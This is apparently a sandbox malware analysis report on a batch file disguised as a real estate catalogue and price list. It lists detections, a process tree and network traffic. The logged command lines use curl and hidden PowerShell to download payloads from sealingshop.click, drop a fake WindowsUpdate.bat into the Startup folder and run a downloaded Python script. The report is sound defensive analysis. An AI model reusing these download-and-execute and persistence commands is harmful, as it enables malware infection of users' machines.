Edit tour

Windows Analysis Report
Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

Overview

General Information

Sample name:	Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat
Analysis ID:	1568178
MD5:	85b266cd4025ee21be3143314a4aec33
SHA1:	3fadc615f950cab3bedd4af1cff07fe0854e475f
SHA256:	c40d41df6e12280dc1b2730abc5d22552e3985be871d43ae3f174d7976678653
Tags:	batuser-smica83
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

AI detected suspicious sample

Drops script or batch files to the startup folder

Found large BAT file

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Dropped file seen in connection with other malware

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1964 cmdline: curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2156,i,11219645058494437623,14001891473156078966,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

powershell.exe (PID: 984 cmdline: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat"; MD5: 04029E121A0CFA5991749937DD22A1D9)

curl.exe (PID: 8072 cmdline: curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

powershell.exe (PID: 6528 cmdline: powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39 MD5: 04029E121A0CFA5991749937DD22A1D9)

curl.exe (PID: 6416 cmdline: curl https://sealingshop.click/py/rose_tien -o "C:\\Users\\Public\\python39\\documents.py" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

python.exe (PID: 1436 cmdline: C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py" MD5: D1888CDE122FF5031E57EB5CE8D1C0B3)

svchost.exe (PID: 6204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7864 cmdline: cmd /c powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1308 cmdline: powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py; MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py", CommandLine: C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py", CommandLine|base64offset|contains: , Image: C:\Users\Public\python39\python.exe, NewProcessName: C:\Users\Public\python39\python.exe, OriginalFileName: C:\Users\Public\python39\python.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2352, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py", ProcessId: 1436, ProcessName: python.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6528, TargetFilename: C:\Users\Public\python39\Lib\ctypes\macholib\fetch_macholib.bat

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, ProcessId: 984, ProcessName: powershell.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 104.21.36.187, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\python39\python.exe, Initiated: true, ProcessId: 1436, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50030

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 2352, TargetFilename: C:\Users\Public\python39

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6528, TargetFilename: C:\Users\Public\python39\Lib\ctypes\macholib\fetch_macholib.bat

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, ProcessId: 984, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat", CommandLine: curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2352, ParentProcessName: cmd.exe, ProcessCommandLine: curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat", ProcessId: 1964, ProcessName: curl.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";, ProcessId: 984, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6204, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 984, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat

Suricata Signatures

ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:20:01.878537+0100	2052959	1	A Network Trojan was detected	192.168.2.5	49706	104.21.36.187	443	TCP
2024-12-04T12:20:12.236455+0100	2052959	1	A Network Trojan was detected	192.168.2.5	49716	104.21.36.187	443	TCP
2024-12-04T12:20:19.463493+0100	2052959	1	A Network Trojan was detected	192.168.2.5	49733	104.21.36.187	443	TCP
2024-12-04T12:21:43.613902+0100	2052959	1	A Network Trojan was detected	192.168.2.5	49995	104.21.36.187	443	TCP
2024-12-04T12:21:58.243329+0100	2052959	1	A Network Trojan was detected	192.168.2.5	50030	104.21.36.187	443	TCP

ET MALWARE Unknown Microsoft Office Document Malware Domain in DNS Lookup (sealingshop .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:20:00.399886+0100	2052958	1	A Network Trojan was detected	192.168.2.5	61287	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sealingshop.click/app/python39.zip

Avira URL Cloud: Label: phishing

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\python39\Lib\site-packages\isapi\README.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49995 version: TLS 1.2

Source:	Binary string: D:\_w\1\b\bin\amd64\python.pdb source: python.exe, 00000012.00000000.3105393236.00007FF60C6C3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.16.dr
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-39\Release\dde.pdb''!GCTL source: dde.pyd.16.dr
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-39\Release\dde.pdb source: dde.pyd.16.dr

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052958 - Severity 1 - ET MALWARE Unknown Microsoft Office Document Malware Domain in DNS Lookup (sealingshop .click) : 192.168.2.5:61287 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052959 - Severity 1 - ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI : 192.168.2.5:49706 -> 104.21.36.187:443
Source: Network traffic	Suricata IDS: 2052959 - Severity 1 - ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI : 192.168.2.5:49716 -> 104.21.36.187:443
Source: Network traffic	Suricata IDS: 2052959 - Severity 1 - ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI : 192.168.2.5:49733 -> 104.21.36.187:443
Source: Network traffic	Suricata IDS: 2052959 - Severity 1 - ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI : 192.168.2.5:50030 -> 104.21.36.187:443
Source: Network traffic	Suricata IDS: 2052959 - Severity 1 - ET MALWARE Observed Office Document Malware Domain (sealingshop .click) in TLS SNI : 192.168.2.5:49995 -> 104.21.36.187:443

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: global traffic	HTTP traffic detected: GET /bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio HTTP/1.1Host: sealingshop.clickUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /config/stu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sealingshop.clickConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA/d=1/ed=1/br=1/rs=ACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
